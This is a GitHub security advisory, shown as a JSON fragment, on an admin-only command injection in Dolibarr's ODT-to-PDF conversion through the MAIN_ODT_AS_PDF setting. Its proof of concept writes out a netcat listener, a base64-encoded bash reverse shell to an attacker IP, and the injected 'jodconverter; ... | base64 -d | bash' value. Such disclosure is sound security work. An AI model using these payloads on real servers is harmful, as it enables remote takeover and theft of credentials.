+ "details": "### Summary\nAn authenticated administrator can execute arbitrary operating system commands by injecting a malicious payload into the `MAIN_ODT_AS_PDF` configuration constant. This vulnerability exists because the application fails to properly validate or escape the command path before passing it to the `exec()` function in the ODT to PDF conversion process.\n\n### Details\nThe vulnerability is located in `htdocs/includes/odtphp/odf.php`.\nWhen the system tries to convert an ODT document to PDF (e.g., in Proposals, Invoices), it constructs a shell command using the `MAIN_ODT_AS_PDF` global setting.\n\nCode snippet (`htdocs/includes/odtphp/odf.php`, approx line 930):\n```php\n$command = getDolGlobalString('MAIN_ODT_AS_PDF').' '.escapeshellcmd($name);\n// ...\nexec($command, $output_arr, $retval);\n```\n\nWhile the filename `$name` is sanitized using `escapeshellcmd()`, the configuration variable `MAIN_ODT_AS_PDF` is retrieved directly from the database and concatenated at the beginning of the string. An attacker with administrative privileges can set this variable to include a command separator (like `;`) followed by arbitrary commands.\n\n### PoC\n**Prerequisites:**\n1. Login as an Administrator.\n2. Ensure the \"Commercial Proposals\" module is enabled and \"ODT templates\" are activated in its setup.\n\n**Steps to reproduce (Reverse Shell):**\n\n1. Start a netcat listener on the attacker's machine (IP: `172.26.0.1`, Port: `4445`):\n ```bash\n nc -lvnp 4445\n ```\n\n2. Prepare the payload. To avoid issues with special characters (like `&` or `>`) being escaped by the web application or shell, encode the reverse shell command in Base64:\n ```bash\n # Command: bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'\n echo \"bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'\" | base64\n # Output: YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK\n ```\n\n3. Navigate to **Home -> Setup -> Other Setup**.\n\n4. Add or modify the constant `MAIN_ODT_AS_PDF` with the following injection payload:\n ```bash\n jodconverter; echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK | base64 -d | bash\n ```\n *(Explanation: `jodconverter` satisfies the initial check, `;` acts as a command separator, and the pipeline decodes and executes the Base64 payload).*\n<img width=\"1898\" height=\"696\" alt=\"image\" src=\"https://github.com/user-attachments/assets/12e4aa61-eb9d-4342-bd03-9a1e824b8316\" />\n\n5. Navigate to **Commerce -> New proposal**, create a draft, select an ODT template (e.g., `generic_proposal_odt`), and click **Generate**.\n<img width=\"1907\" height=\"668\" alt=\"image\" src=\"https://github.com/user-attachments/assets/d790847e-50c1-47eb-994b-b2596b949242\" />\n<img width=\"1858\" height=\"346\" alt=\"image\" src=\"https://github.com/user-attachments/assets/afbeb170-d004-49d6-a395-1b4572fbf2e7\" />\n<img width=\"848\" height=\"183\" alt=\"image\" src=\"https://github.com/user-attachments/assets/93fbe6c9-96a8-4d0f-ad0e-4aea69f0fec1\" />\n\n6. Check the netcat listener. A connection will be established, granting a shell on the server:\n \n<img width=\"616\" height=\"193\" alt=\"image\" src=\"https://github.com/user-attachments/assets/e90817da-9bb2-4fe1-8377-be10d8640e37\" />\n\n\n### Impact\n**Remote Code Execution (RCE).**\nAn attacker who gains access to an administrator account (or a malicious administrator) can execute arbitrary commands on the underlying server with the privileges of the web server user (typically `www-data`). This allows for:\n- Reading sensitive configuration files (database credentials).\n- Modifying application code.\n- Full system compromise depending on server configuration (e.g., docker escape, pivoting).\n\n---\n\n### Credits\nReported by Łukasz Rybak",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments